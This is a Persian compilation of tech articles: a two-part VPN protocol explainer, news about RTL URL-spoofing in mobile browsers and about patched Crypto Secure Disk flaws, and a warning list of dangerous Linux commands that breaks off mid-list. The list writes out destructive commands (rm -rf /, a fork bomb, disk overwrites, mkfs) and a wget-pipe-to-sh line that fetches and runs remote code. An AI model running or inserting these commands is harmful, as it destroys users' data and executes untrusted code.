همه چیز در مورد VPN – قسمت دوم

در مقاله پیشین به مبانی VPN و معرفی این پروتکل اشاره کردیم. امروز میخواهیم در مورد این پروتکل بیشتر بدانیم.

انواع تونل 
تونل‌ها به دو نوع اصلی تقسیم می‌گردند: اختیاری و اجباری.

تونل اختیاری 
تونل اختیاری به‌وسیله کاربر و از سمت کامپیوتر کلاینت طی یک عملیات هوشمند، پیکربندی و ساخته می‌شود. کامپیوتر کاربر نقطه انتهایی تونل بوده و به‌عنوان تونل کلاینت عمل می‌کند. تونل اختیاری زمانی تشکیل می‌شود که کلاینت برای ساخت تونل به سمت تونل سرور مقصد داوطلب شود.

هنگامی‌که کلاینت به‌عنوان تونل کلاینت قصد انجام عملیات دارد، پروتکل Tunneling موردنظر باید بر روی سیستم کلاینت نصب گردد. تونل اختیاری می‌تواند در هریک از حالت‌های زیر اتفاق بیفتد:

– کلاینت ارتباطی داشته باشد که بتواند ارسال اطلاعات پوشش گذاری شده را از طریق مسیریابی به سرور منتخب خود انجام دهد .

– کلاینت ممکن است قبل از این‌که بتواند تونل را پیکربندی کند، ارتباطی را از طریق DialUp برای تبادل اطلاعات برقرار کرده باشد. این معمول‌ترین حالت ممکن است. بهترین مثال از این حالت، کاربران اینترنت هستند. قبل از این‌که یک تونل برای کاربران بر روی اینترنت ساخته شود، آن‌ها باید به ISP خود شماره‌گیری کنند و یک ارتباط اینترنتی را تشکیل دهند.

تونل اجباری 
تونل اجباری برای کاربرانی پیکر بندی و ساخته می شود که دانش لازم را نداشته و یا دخالتی در ساخت تونل نخواهند داشت. در تونل اختیاری، کاربر، نقطه نهایی تونل نیست. بلکه یک Device دیگر بین سیستم کاربر و تونل سرور، نقطه نهایی تونل است که به‌عنوان تونل کلاینت عمل می‌نماید.

اگر پروتکل Tunneling بر روی کامپیوترکلاینت نصب و راه اندازی نشده و در عین حال تونل هنوز مورد نیاز و درخواست باشد، این امکان وجود دارد که یک کامپیوتر دیگر و یا یک Device شبکه دیگر، تونلی از جانب کامپیوتر کلاینت ایجاد نماید.

این وظیفه‌ای است که به یک متمرکزکننده دسترسی (AC) به تونل، ارجاع داده شده است. در مرحله تکمیل این وظیفه، متمرکزکننده دسترسی یا همان AC باید پروتکل Tunneling مناسب را ایجاد کرده و قابلیت برقراری تونل را در هنگام اتصال کامپیوتر کلاینت داشته باشد. هنگامی‌که ارتباط از طریق اینترنت برقرار می شود، کامپیوتر کلاینت یک تونل تأمین شده (NAS (Network Access Service را از طریق ISP احضار می‌کند.

به‌عنوان مثال یک سازمان ممکن است قراردادی با یک ISP داشته باشد تا بتواند کل کشور را توسط یک متمرکزکننده دسترسی به‌هم پیوند دهد. این AC می‌تواند تونل‌هایی را از طریق اینترنت برقرار کند که به یک تونل سرور متصل باشند و از آن طریق به شبکه خصوصی مستقر در سازمان مذکور دسترسی پیدا کنند.

این پیکربندی به‌عنوان تونل اجباری شناخته می‌شود، به‌دلیل این‌که کلاینت مجبور به استفاده از تونل ساخته شده به‌وسیله AC شده است. یک‌بار که این تونل ساخته شد، تمام ترافیک شبکه از سمت کلاینت و نیز از جانب سرور به‌صورت خودکار از طریق تونل مذکور ارسال خواهد شد.

به‌وسیله این تونل اجباری، کامپیوتر کلاینت یک ارتباط PPP می‌سازد و هنگامی‌که کلاینت به NAS، از طریق شماره‌گیری متصل می‌شود، تونل ساخته می‌شود و تمام ترافیک به‌طور خودکار از طریق تونل، مسیریابی و ارسال می‌گردد. تونل اجباری می تواند به‌طور ایستا و یا خودکار و پویا پیکربندی شود.

تونل‌های اجباری ایستا 
پیکربندی تونل‌های Static معمولاً به تجهیزات خاص برای تونل‌های خودکار نیاز دارند. سیستم Tunneling خودکار به‌گونه‌ای اعمال می‌شود که کلاینت‌ها به AC از طریق شماره‌گیری (Dialup) متصل می‌شوند. این مسأله احتیاج به خطوط دسترسی محلی اختصاصی و نیز تجهیزات دسترسی شبکه دارد که به این‌ها هزینه‌های جانبی نیز اضافه می‌گردد.

برای مثال کاربران احتیاج دارند که با یک شماره تلفن خاص تماس بگیرند، تا به یک AC متصل شوند که تمام ارتباطات را به‌طور خودکار به یک تونل سرور خاص متصل می‌کند. در طرح‌های Tunneling ناحیه‌ای، متمرکزکننده دسترسی بخشی از User Name را که Realm خوانده می‌شود بازرسی می‌کند تا تصمیم بگیرد در چه موقعیتی از لحاظ ترافیک شبکه، تونل را تشکیل دهد.

تونل‌های اجباری پویا 
در این سیستم انتخاب مقصد تونل براساس زمانی که کاربر به AC متصل می شود، ساخته می‌شود. کاربران دارای Realm یکسان، ممکن است تونل‌هایی با مقصدهای مختلف تشکیل بدهند. البته این امر به پارامترهای مختلف آن‌ها مانند UserName، شماره تماس، محل فیزیکی و زمان بستگی دارد.

تونل‌های Dynamic، دارای قابلیت انعطاف عالی هستند. همچنین تونل‌های پویا اجازه می‌دهند که AC به‌عنوان یک سیستم Multi-NAS عمل کند، یعنی اینکه همزمان هم ارتباطات Tunneling را قبول می کند و هم ارتباطات کلاینت‌های عادی و بدون تونل را. در صورتی که متمرکزکننده دسترسی بخواهد نوع کلاینت تماس‌گیرنده را مبنی بر دارای تونل بودن یا نبودن از قبل تشخیص بدهد، باید از همکاری یک بانک اطلاعاتی سود ببرد.

برای این‌کار باید AC اطلاعات کاربران را در بانک اطلاعاتی خود ذخیره کند که بزرگترین عیب این مسأله این است که این بانک اطلاعاتی به خوبی قابل مدیریت نیست.

بهترین راه‌حل این موضوع، راه‌اندازی یک سرور RADIUS است، سروری که اجازه می‌دهد که تعداد نامحدودی سرور، عمل شناسایی Userهای خود را بر روی یک سرور خاص یعنی همین سرور RADIUS انجام دهند، به‌عبارت بهتر این سرور مرکزی برای ذخیره و شناسایی و احراز هویت نمودن کلیه کاربران شبکه خواهد بود.

پروتکل‌های VPN 
عمده‌ترین پروتکل‌هایی که به‌وسیله ویندوز ۲۰۰۰ برای دسترسی به VPN استفاده می شوند
عبارتند از: L2TP ،Ipsec ،PPTP ،IP-IP

البته پروتکل امنیتی SSL نیز جزء پروتکل‌های مورد استفاده در VPN به شمار می‌آید، ولی به‌علت این‌که SSL بیشتر بر روی پروتکل‌های HTTP ،LDAP ،POP3 ،SMTP و … مورد استفاده قرار می‌گیرد، بحث در مورد آن را به فرصتی دیگر موکول می‌کنیم.

پروتکلPPTP 
پروتکل Tunneling نقطه به نقطه، بخش توسعه یافته‌ای از پروتکل PPP است که فریم‌های پروتکل PPP را به‌صورت
IP برای تبادل آن‌ها از طریق یک شبکه IP مانند اینترنت توسط یک سرایند، کپسوله می‌کند. این پروتکل می‌تواند در شبکه‌های خصوصی از نوع LAN-to-LAN نیز استفاده گردد.

پروتکل PPTP به‌وسیله انجمنی از شرکت‌های مایکروسافت، Ascend Communications ،۳com ،ESI و US Robotics ساخته شد.

PPTP یک ارتباط TCP را (که یک ارتباط Connection Oriented بوده و پس از ارسال پکت منتظر Acknowledgment آن می‌ماند) برای نگهداری تونل و فریم‌های PPP کپسوله شده توسط (GRE (Generic Routing Encapsulation که به معنی کپسوله کردن مسیریابی عمومی است،

برای Tunneling کردن اطلاعات استفاده می‌کند. ضمناً اطلاعات کپسوله‌شده PPP قابلیت رمزنگاری و فشرده شدن را نیز دارا هستند.

تونل‌های PPTP باید به‌وسیله مکانیسم گواهی همان پروتکل PPP که شامل (EAP ،CHAP ،MS-CHAP ،PAP)می‌شوند، گواهی شوند. در ویندوز ۲۰۰۰ رمزنگاری پروتکل PPP فقط زمانی استفاده می‌گردد که پروتکل احراز هویت یکی از پروتکل‌های EAP ،TLS و یا MS-CHAP باشد.

باید توجه شود که رمزنگاری PPP، محرمانگی اطلاعات را فقط بین دو نقطه نهایی یک تونل تأمین می‌کند و در صورتی‌که به امنیت بیشتری نیاز باشد، باید از پروتکل Ipsec استفاده شود.

پروتکل L2TP 
پروتکل L2TP ترکیبی است از پروتکل‌های PPTP و (L2F (Layer 2 Forwarding که توسط شرکت سیسکو توسعه یافته است. این پروتکل ترکیبی است از بهترین خصوصیات موجود در L2F و PPTP.

L2TP نوعی پروتکل شبکه است که فریم‌های PPP را برای ارسال بر روی شبکه‌های IP مانند اینترنت و علاوه بر این برای شبکه‌های مبتنی بر X.25 ،Frame Relay و یا ATM کپسوله می‌کند.

هنگامی‌که اینترنت به‌عنوان زیرساخت تبادل اطلاعات استفاده می‌گردد، L2TP می‌تواند به‌عنوان پروتکل
Tunneling از طریق اینترنت مورد استفاده قرار گیرد.

L2TP برای نگهداری تونل از یک سری پیغام‌های L2TP و نیز از پروتکل UDP (پروتکل تبادل اطلاعات به‌صورتConnection Less که پس از ارسال اطلاعات منتظر دریافت Acknowledgment نمی‌شود و اطلاعات را، به مقصد رسیده فرض می‌کند) استفاده می‌کند.

در L2TP نیز فریم‌های PPP کپسوله شده می‌توانند همزمان علاوه بر رمزنگاری شدن، فشرده نیز شوند. البته مایکروسافت پروتکل امنیتی Ipsec (که به‌طور مفصل در شماره ۴۷ ماهنامه شبکه تحت عنوان “امنیت اطلاعات در حین انتقال به‌وسیله IPsec ” معرفی شده) را به‌جای رمزنگاری PPP توصیه می کند. ساخت تونل L2TP نیز باید همانند PPTP توسط مکانیسم (PPP EAP ،CHAP ،MS-CHAP ،PAP) بررسی و تأیید شود.

PPTP در مقابلL2TP 
هر دو پروتکل PPTP و L2TP از پروتکل PPP برای ارتباطات WAN استفاده می کنند تا نوعی اطلاعات ابتدایی برای دیتا را فراهم کنند و سپس یک سرایند اضافه برای انتقال اطلاعات از طریق یک شبکه انتقالی به پکت الحاق بنمایند. هرچند این دو پروتکل در برخی موارد نیز با هم تفاوت دارند. برخی از این تفاوت‌ها عبارتند از:

۱- شبکه انتقال که PPTP احتیاج دارد، باید یک شبکه IP باشد. ولی L2TP فقط به یک تونل احتیاج دارد تا بتواند ارتباط Point-to-Point را برقرار کند. حال این تونل می تواند بر روی یک شبکه IP باشد و یا بر روی شبکه‌های دیگر مانند X.25 و یا ATM ،Frame Relay.

۲- L2TP قابلیت فشرده‌سازی سرایند را داراست. هنگامی‌که فشرده‌سازی سرایند انجام می‌گیرد، L2TP با حجم ۴ بایت عمل می‌کند، در حالی‌که PPTP با حجم ۶ بایت عمل می‌نماید.

۳- L2TP متد احراز هویت را تأمین می‌کند، در حالی‌که PPTP این‌گونه عمل نمی‌کند، هرچند وقتی‌که PPTP یا L2TP از طریق پروتکل امنیتی IPsec اجرا می‌شوند، هر دو، متد احراز هویت را تأمین می‌نمایند.

۴- PPTP رمزنگاری مربوط به PPP را استفاده می‌کند، ولی L2TP از پروتکل Ipsec برای رمزنگاری استفاده می‌نماید.

پروتکل Ipsec 
Ipsec یک پروتکل Tunneling لایه سوم است که از متد ESP برای کپسوله کردن و رمزنگاری اطلاعات IP برای تبادل امن اطلاعات از طریق یک شبکه کاری IP عمومی یا خصوصی پشتیبانی می‌کند. IPsec به‌وسیله متد ESP می‌تواند اطلاعات IP را به‌صورت کامل کپسوله کرده و نیز رمزنگاری کند.

به محض دریافت اطلاعات رمزگذاری شده، تونل سرور، سرایند اضافه‌شده به IP را پردازش کرده و سپس کنار می‌گذارد و بعد از آن رمزهای ESP و پکت را باز می‌کند. بعد از این مراحل است که پکت IP به‌صورت عادی پردازش می‌شود. پردازش عادی ممکن است شامل مسیریابی و ارسال پکت به مقصد نهایی آن باشد.

پروتکل IP-IP 
این پروتکل که با نام IP-in-IP نیز شناخته می‌شود، یک پروتکل لایه سوم یعنی لایه شبکه است. مهمترین استفاده پروتکل IP-IP برای ایجاد سیستم Tunneling به‌صورت Multicast است که در شبکه‌هایی که سیستم مسیریابی Multicast را پشتیبانی نمی‌کنند کاربرد دارد. ساختار پکت IP-IP تشکیل شده است از: سرایند IP خارجی، سرایند تونل، سرایند IP داخلی و اطلاعات IP. اطلاعات IP می‌تواند شامل هر چیزی در محدوه IP مانند TCP ،UDP ،ICMP و اطلاعات اصلی پکت باشد.

مدیریت VPN 
در بیشتر موارد مدیریت یک VPN مانند مدیریت یک RAS سرور (به‌طور خلاصه، سروری که ارتباط‌ها و Connection های برقرار شده از طریق راه دور را کنترل و مدیریت می‌کند)، می‌باشد. البته امنیت VPN باید به دقت توسط ارتباطات اینترنتی مدیریت گردد.

مدیریت کاربران VPN 
بیشتر مدیران شبکه برای مدیریت کاربران خود از یک پایگاه داده مدیریت کننده اکانت‌ها بر روی کامپیوتر DC و یا از سرور RADIUS استفاده می‌نمایند. این کار به سرور VPN اجازه می‌دهد تا اعتبارنامه احراز هویت کاربران را به یک سیستم احراز هویت مرکزی ارسال کند.

مدیریت آدرس‌ها و Name Serverها 
سرور VPN باید رشته‌ای از آدرس‌های IP فعال را در خود داشته باشد تا بتواند آن‌ها را در طول مرحله پردازش ارتباط از طریق پروتکل کنترل IP به‌نام IPCP به درگاه‌های VPN Server و یا Clientها اختصاص دهد.

در VPNهایی که مبتنی بر ویندوز ۲۰۰۰ پیکربندی می‌شوند، به‌صورت پیش‌فرض، IP آدرس‌هایی که به Clientهای VPN اختصاص داده می‌شود، از طریق سرور DHCP گرفته می‌شوند.

البته همان‌طور که قبلاً گفته شد شما می‌توانید یک رشته IP را به‌صورت دستی یعنی ایستا به‌جای استفاده از DHCP اعمال کنید. ضمنا ًVPN Server باید توسط یک سیستم تأمین‌کننده نام مانند DNS و یا WINS نیز پشتیبانی شود تا بتواند سیستم IPCP را به مورد اجرا بگذارد.

همه چیز در مورد VPN – قسمت اول

VPN

(VPN (Virtual Private Network یک شبکه خصوصی مجازی است که ارتباطات کپسوله‌شده (Encapsulated)، رمزنگاری‌شده (Encrypted) و تصدیق‌شده (Authenticated) را با استفاده از سیستم مسیریابی زیرساخت شبکه از طریق یک شبکه عمومی مانند اینترنت ایجاد و مدیریت می‌کند. این ارتباط می‌تواند بین دو سیستم عادی برقرار شده و یا برای ارتباط امن سرور یک سازمان با شعب آن در سراسر جهان به‌کار رود. VPN برای کاربران تجاری بیش از یک ضرورت و بلکه نعمتی است که راهی مطمئن، امن و در عین حال ارزان برای دسترسی به فایل‌هایشان در شبکه محل کار خود (وقتی که آن‌ها در مسافرت، خانه و یا در راه هستند) در اختیار می‌گذارد. کاربران در حالت عادی برای تماس به‌صورت Remote (راه دور) با سرور نیاز دارند که به‌صورت مستقیم و توسط یک ارتباط DialUp به سرور RAS متصل شوند ، اما این‌کار دو اشکال اساسی دارد … لطفاً ادامه مقاله را بخوانید.

استفاده از RAS سرور و خط تلفن‌ برای برقراری ارتباط دو مشکل عمده دارد که عبارتند از:
۱) در صورتی‌که RAS سرور و سیستم تماس‌گیرنده در یک استان قرار نداشته باشند، علاوه بر لزوم پرداخت هزینه زیاد، سرعت ارتباط نیز پایین خواهد آمد و این مسأله وقتی بیشتر نمود پیدا می کند که کاربر نیاز به ارتباطی با سرعت مناسب داشته باشد.

۲) در صورتی‌که تعداد اتصالات راه دور در یک لحظه بیش از یک مورد باشد، RAS سرور به چندین خط تلفن و مودم احتیاج خواهد داشت که باز هم مسأله هزینه مطرح می گردد.

اما با ارتباط VPN مشکلات مذکور به‌طور کامل حل می‌شود و کاربر با اتصال به ISP محلی به اینترنت متصل شده و VPN بین کامپیوتر کاربر و سرور سازمان از طریق اینترنت ایجاد می‌گردد. ارتباط مذکور می تواند از طریق خط DialUpو یا خط اختصاصی مانند Leased Line برقرار شود.

به‌هر حال اکنون مسأله این نیست که طریقه استفاده از VPN چیست، بلکه مسأله این است که کدامیک از تکنولوژی‌های VPN باید مورد استفاده قرار گیرند. پنج نوع پروتکل در VPN مورد استفاده قرار می گیرد که هرکدام مزایا و معایبی دارند . در این مقاله ما قصد داریم در مورد هرکدام از این پروتکل‌ها بحث کرده و آنها را مقایسه کنیم . البته نتیجه گیری نهایی به هدف شما در استفاده از VPN بستگی دارد.

ارتباط سیستم‌ها در یک اینترانت 
در برخی سازمان‌ها، اطلاعات یک دپارتمان خاص به‌دلیل حساسیت بالا، به‌طور فیزیکی از شبکه اصلی داخلی آن سازمان جدا گردیده است. این مسأله علیرغم محافظت از اطلاعات آن دپارتمان، مشکلات خاصی را نیز از بابت دسترسی کاربران دپارتمان مذکور به شبکه‌های خارجی به‌وجود می‌آورد.

VPN اجازه می دهد که شبکه دپارتمان مذکور به‌صورت فیزیکی به شبکه مقصد مورد نظر متصل گردد، اما به‌صورتی‌که توسط VPN سرور، جدا شده است (با قرار گرفتن VPN سرور بین دو شبکه).

البته لازم به یادآوری است که نیازی نیست VPN سرور به‌صورت یک Router مسیریاب بین دو شبکه عمل نماید، بلکه کاربران شبکه مورد نظر علاوه بر این‌که خصوصیات و Subnet شبکه خاص خود را دارا هستند به VPN سرور متصل شده و به اطلاعات مورد نظر در شبکه مقصد دست می یابند.

علاوه بر این تمام ارتباطات برقرار شده از طریق VPN، می‌توانند به منظور محرمانه ماندن رمزنگاری شوند. برای کاربرانی که دارای اعتبارنامه مجاز نیستند، اطلاعات مقصد به‌صورت خودکار غیر قابل رویت خواهند بود .

مبانی Tunneling 
Tunneling یا سیستم ایجاد تونل ارتباطی با نام کپسوله کردن (Encapsulation) نیز شناخته می‌شود که روشی است برای استفاده از زیرساخت یک شبکه عمومی جهت انتقال اطلاعات. این اطلاعات ممکن است از پروتکل‌های دیگری باشد. اطلاعات به‌جای این‌که به‌صورت اصلی و Original فرستاده شوند، با اضافه کردن یک Header (سرایند) کپسوله می‌شوند.

این سرایند اضافی که به پکت متصل می‌شود، اطلاعات مسیریابی را برای پکت فراهم می کند تا اطلاعات به‌صورت صحیح، سریع و فوری به مقصد برسند. هنگامی که پکت‌های کپسوله شده به مقصد رسیدند، سرایندها از روی پکت برداشته شده و اطلاعات به‌صورت اصلی خود تبدیل می‌شوند. این عملیات را از ابتدا تا اتمام کار Tunneling می‌نامند.

نگهداری تونل 
مجموعه عملیات متشکل از پروتکل نگهداری تونل و پروتکل تبادل اطلاعات تونل به‌نام پروتکل Tunneling شناخته می‌شوند . برای این‌که این تونل برقرار شود، هم کلاینت و هم سرور می‌بایست پروتکل Tunneling یکسانی را مورد استفاده قرار دهند. از جمله پروتکل‌هایی که برای عملیات Tunneling مورد استفاده قرار می‌گیرند PPTP و L2TP هستند که در ادامه مورد بررسی قرار خواهند گرفت.

پروتکل نگهداری تونل 
پروتکل نگهداری تونل به‌عنوان مکانیسمی برای مدیریت تونل استفاده می‌شود. برای برخی از تکنولوژی‌هایTunneling مانند PPTP و L2TP یک تونل مانند یک Session می‌باشد، یعنی هر دو نقطه انتهایی تونل علاوه بر این‌که باید با نوع تونل منطبق باشند، می‌بایست از برقرار شدن آن نیز مطلع شوند.

هرچند بر خلاف یک Session، یک تونل دریافت اطلاعات را به‌صورتی قابل اطمینان گارانتی نمی‌کند و اطلاعات ارسالی معمولاً به‌وسیله پروتکلی بر مبنای دیتاگرام مانندUDP هنگام استفاده از L2TP یا TCP برای مدیریت تونل و یک پروتکل کپسوله کردن مسیریابی عمومی اصلاح شده به‌نام GRE برای وقتی که PPTP استفاده می گردد، پیکربندی و ارسال می‌شوند.

ساخته شدن تونل 
یک تونل باید قبل از این‌که تبادل اطلاعات انجام شود، ساخته شود. عملیات ساخته شدن تونل به‌وسیله یک طرف تونل یعنی کلاینت آغاز می‌شود و طرف دیگر تونل یعنی سرور، تقاضای ارتباط Tunneling را دریافت می‌کند. برای ساخت تونل یک عملیات ارتباطی مانند PPP انجام می‌شود.

سرور تقاضا می‌کند که کلاینت خودش را معرفی کرده و معیارهای تصدیق هویت خود را ارائه نماید. هنگامی که قانونی بودن و معتبر بودن کلاینت مورد تأیید قرار گرفت، ارتباط تونل مجاز شناخته شده و پیغام ساخته شدن تونل توسط کلاینت به سرور ارسال می‌گردد و سپس انتقال اطلاعات از طریق تونل شروع خواهد شد.

برای روشن شدن مطلب، مثالی می‌زنیم. اگر محیط عمومی را، که غالبا نیز همین‌گونه است، اینترنت فرض کنیم، کلاینت پیغام ساخته شدن تونل را از آدرس IP کارت شبکه خود به‌عنوان مبدا به آدرس IP مقصد یعنی سرور ارسال می‌کند. حال اگر ارتباط اینترنت به‌صورت DialUp از جانب کلاینت ایجاد شده باشد، کلاینت به‌جای آدرس NIC خود، آدرس IP را که ISP به آن اختصاص داده به‌عنوان مبدا استفاده خواهد نمود.

نگهداری تونل 
در برخی از تکنولوژی‌های Tunneling مانند L2TP و PPTP، تونل ساخته شده باید نگهداری و مراقبت شود . هر دو انتهای تونل باید از وضعیت طرف دیگر تونل باخبر باشند. نگهداری یک تونل معمولا از طریق عملیاتی به‌نام نگهداری فعال (KA) اجرا می‌گردد که طی این پروسه به‌صورت دوره زمانی مداوم از انتهای دیگر تونل آمارگیری می‌شود. این‌کار هنگامی که اطلاعاتی در حال تبادل نیست، انجام می پذیرد.

پروتکل تبادل اطلاعات تونل 
زمانی که یک تونل برقرار می‌شود، اطلاعات می‌توانند از طریق آن ارسال گردند. پروتکل تبادل اطلاعات تونل، اطلاعات را کپسوله کرده تا قابل عبور از تونل باشند. وقتی که تونل کلاینت قصد ارسال اطلاعات را به تونل سرور دارد، یک سرایند (مخصوص پروتکل تبادل اطلاعات) را بر روی پکت اضافه می‌کند. نتیجه این‌کار این است که اطلاعات از طریق شبکه عمومی قابل ارسال شده و تا تونل سرور مسیریابی می‌شوند.

تونل سرور پکت‌ها را دریافت کرده و سرایند اضافه شده را از روی اطلاعات برداشته و سپس اطلاعات را به‌صورت اصلی درمی آورد.

انواع تونل 
تونل‌ها به دو نوع اصلی تقسیم می‌گردند: اختیاری و اجباری.

مرورگرهای کروم، فایرفاکس و چند مرورگر دیگر از نوعی آسیب پذیری رنج می برند

مرورگرهای کروم، فایرفاکس و چند مرورگر دیگر از نوعی آسیب پذیری رنج می برند که می تواند برای جاسوسی از نوار آدرس مورد استفاده قرار گیرد. بعضی از این سازندگان مرورگر هم اکنون در حال کار برای از بین بردن این آسیب پذیری هستند.

محقق پاکستانی رفاعی بلوج کشف کرده است که نوار آدرس مرورگر گوگل کروم هم از آسیب پذیری omnibox رنج می برد که می تواند برای برگرداندن نشانی های اینترنتی استفاده شود.

این مشکل که بر مرورگر کروم اندروید تأثیر می گذارد مربوط به نحوه نوشتن شده عربی و راست به چپ بودن آن ها می شود (RTL). اگر نشانی مهاجم با یک نشانی IP شروع شود و حاوی نشانه های عربی باشد میزبان نشانی و مسیر آن معکوس می شوند.

برای مثال نشانی /۱/۱۲۷٫۰٫۰٫۱٫http://example.com به ۱۲۷.۰.۰.۱/ا/<http://example.com</a تبدیل می شود چراکه حاوی حرف الف عربی است و درنتیجۀ آن نشانی از راست به چپ نمایش داده می شود. این شیوه برای سایر حروف عربی نیز به همین شکل و تا زمانی که از نشانه های راست به چپ استفاده شود عمل می کند؛ اعداد و نشانه ها در نشانی IP به عنوان علائم «ضعیف» در نظر گرفته می شوند.

بلوچ در وب نوشت اینترنتی خود نوشته است: «بخش نشانی های IP می توانند به راحتی و به خصوص بر روی مرورگرهای تلفن همراه با انتخاب یک نشانی اینترنتی طولانی مخفی شوند (google.com/fakepath/fakepath/fakepath/… /۱۲۷.۰.۰.۱) تا این حمله را واقعی تر نشان بدهند. نسخه ی یونیکد قفل پد می تواند برای نشان دادن حضور SSL استفاده شود».

یک آسیب پذیری مشابه هم در فایرفاکس اندروید وجود دارد (CVE-۲۰۱۶-۵۲۶۷). با این حال، در مورد فایرفاکس نشانی اینترنتی نیازی نیست که نشانی با یک نشانی IP شروع شده باشد. تنها چیزی که در اینجا نیاز است، این است که یک کاراکتر عربی در آن موجود باشد که موجب برعکس شدن نشانی اینترنتی می شود. برای مثال نشانی عربی.امارات/google.com/test/test/test به نشانی google.com/test/test/test/عربی.امارات تبدیل می شود.

گوگل بیش از یک سال است که از این مشکل اطلاع دارد. بلوچ می گوید که به گوگل در مورد وجود مشکل در نسخه اندروید در ماه می اطلاع داده است و این شرکت آن را در اواخر ژوئن وصله کرده است. موزیلا این مشکل را در دوم آگوست برای فایرفاکس اندروید حل کرده است.

بلوچ به SecurityWeek گفته است که دیگر مرورگرها نیز به همین ترتیب تحت تأثیر قرار دارند که شامل انواع مختلفی از نسخه های رومیزی می شوند؛ اما در موارد مربوط به فایرفاکس و گوگل کروم، این آسیب پذیری تنها بر روی نسخه موبایل تأثیر می گذارد.

این محقق ۳۰۰۰ دلار از سوی گوگل، ۱۰۰۰ دلار از سوی موزیلا و ۱۰۰۰ دلار از یک سازنده نامشخص مرورگر که در حال حاضر در حال کار برای وصله این حفره است، دریافت کرده است.

آسیب‌پذیری بحرانی ابزار Cryptware Bitlocker ترمیم شد

پژوهش‌گران امنیتی موفق به شناسایی چند آسیب‌پذیری بحرانی در ابزار Crypto Secure Disk شدند. ابزاری که از سوی شرکت Cryptware ارائه شده است. این شرکت اکنون به‌روزرسانی‌های لازم در این ارتباط را ارائه کرده است.

نرم‌افزار Crypto Secure Disk در اصل مکملی برای ویژگی BitLocker پلتفرم ویندوز است که در زمینه رمزنگاری مورد استفاده قرار می‌گیرد. به طوری که قادر است، ویژگی‌های BitLocker را چند برابر کند. از جمله قابلیت‌هایی که به واسطه این نرم‌افزار در اختیار کاربران قرار می‌گیرد، به احراز هویت PreBoot، پشتیبانی از گذرواژه و نام کاربر معتبر (UID)، احراز هویت PIN و کارت هوشمند می‌توان اشاره کرد.

در همین ارتباط شرکت مشاوره فناوری امنیتی Sec Consult گزارش داده است که این نرم‌افزار به دو آسیب‌پذیری خطرناک آلوده است. این آسیب‌پذیری‌ها به هکرها اجازه می‌دهند به سیستم قربانی حمله کرده و کنترل فیزیکی آن‌را به دست آورند. آسیب‌پذیری اول به هکرها اجازه می‌دهد در مدت زمان فرآیند بوت به ریشه دستگاه  دست پیدا کرده و دستورات مورد نظر خود را اجرا کنند. البته لازم به توضیح است که خروجی دستوراتی که اجرا می‌شوند، هیچ‌گاه برای کاربر قابل مشاهده نخواهند بود. به دلیل این‌که هکرها این توانایی را دارند تا ماشین هدف خود را به یک سرور DHCP متصل کنند.

سرور به ماشین هدف یک آدرس IP اختصاص می‌دهد و در ادامه پوسته ریشه (root shell) را به پورت ۸۱۹۷ متصل می‌کند. اتصال به پورت  ۸۱۹۷ به هکر اجازه می‌دهد، خروجی دستوراتی که اجرا می‌کند را مشاهده کند. آسیب‌پذیری فوق به دلیل عدم پیاده‌سازی مکانیزم درست در ارتباط با مسدود کردن دسترسی به ترمینال از سوی Crypto Secure Disk به وجود آمده است. زمانی که این محصول را نصب می‌کنید، پارتیشن جدیدی ساخته می‌شود که یک سیستم‌عامل کوچک لینوکس را اجرا می‌کند. این سیستم‌عامل قبل از BitLocker اجرا می‌شود. یک هکر قادر است از میانبرهای صفحه‌ کلید به منظور اجرای ترمینال و اجرای دستورات روی آن استفاده کند.

آسیب‌پذیری دوم به واسطه نبود مکانیزم قدرتمند تایید به وجود آمده است. این حفره برای ساخت یک درب پشتی و سرقت اطلاعات می‌تواند مورد استفاده قرار گیرد. آسیب‌پذیری‌های فوق همراه با عرضه نسخه ۵٫۲٫۱ نرم‌افزار CryptoPro ترمیم شده‌اند. در نتیجه پیشنهاد می‌کنیم اگر از این نرم‌افزار استفاده می‌کنید، قبل از هرگونه حادثه ناگواری نسخه جدید را دانلود کنید.

۹ فرمان خطرناک لینوکس که هرگز نباید اجرا شوند!

لینوکس سیستم‌عامل محبوبی است. در حالی که سیستم‌عامل ویندوز این روزها از سوی بسیاری از کاربران مورد استفاده قرار می‌گیرد، اما کم نیستند کاربرانی که ترجیح می‌دهند از لینوکس استفاده کنند. لینوکس طیف گسترده‌ای از فرمان‌های مفید را در اختیار کاربران قرار می‌دهد، با این حال، تعدادی از این دستورات خطرناک هستند. به‌طور مثال، اگر نه فرمانی که در ادامه با آن‌ها آشنا خواهید شد را اجرا کنید، آسیب‌پذیری جبران‌ناپذیری به کامپیوترتان وارد خواهد شد.

اکثر فرمان‌های لینوکس مفید و کاربردی هستند، اما این دستورات موضوع مقاله ما نیستند. ما در این مقاله در مجموع نه مورد از دستورات لینوکس که باعث از کارافتادگی هر کامپیوتری می‌شوند را برای شما فهرست کرده‌ایم. دستوراتی که اجرای آن‌ها مشکلات متعددی را برای شما به همراه خواهند آورد.

۱٫ rm –rf

فرمان rm –rf / هر چیزی را حذف می‌کند، به طوری که نه فقط فایل‌های روی هارددیسک، بلکه فایل‌هایی که روی یک رسانه قابل حمل متصل به کامپیوتر وجود داشته باشد را نیز حذف می‌کند.

۲٫ () {: |: &} ;:

‌() {: |: &} ;: به نام بمب‌ فورک (Fork Bomb) نیز شناخته می‌شوند. بمب فورک نه تنها زمان پردازنده مرکزی را مورد استفاده قرار می‌دهد بلکه جدول فرآیندهای سیستم‌عامل را به طور کامل سرریز می‌کند، به‌طوری که در نهایت باعث به وجود آمدن یک حمله انکار سرویس روی یک سیستم لینوکسی شده و اینکار را تا وقتی که سیستم به طور کامل فریز شده و از دسترس خارج شود، ادامه می‌دهد.

۳٫ command > dev / sda

این فرمان داده‌های خامی را تولید کرده و تمامی فایل‌های درون یک بلوک را با داده‌های خام رونویسی می‌کند. در نتیجه حجم قابل توجهی از داده‌ها در یک بلوک از دست می‌روند.

۴٫ mv directory / dev /null

این فرمان همه اطلاعات شخصی شما را به درون یک حفره سیاه ارسال می‌کند، به این معنی که داده‌ها شما برای همیشه از دست خواهند رفت.

۵٫ wget http: // malicious_source –O | sh

خط بالا اسکریپتی را از وب دانلود کرده و آن‌را برای sh ارسال می‌کند. این‌کار باعث اجرای محتوای درون اسکریپت می‌شود. اجرای اسکرپیت‌هایی که از اینترنت دانلود می‌شوند، همیشه خطرناک است. به دلیل این‌که در اکثر موارد اسکرپیت‌ها غیر قابل اعتماد هستند. در نتیجه سعی کنید تا حد امکان از این دستور برای همیشه دوری کنید.

۶٫ mkfs.ex3 / dev / sda

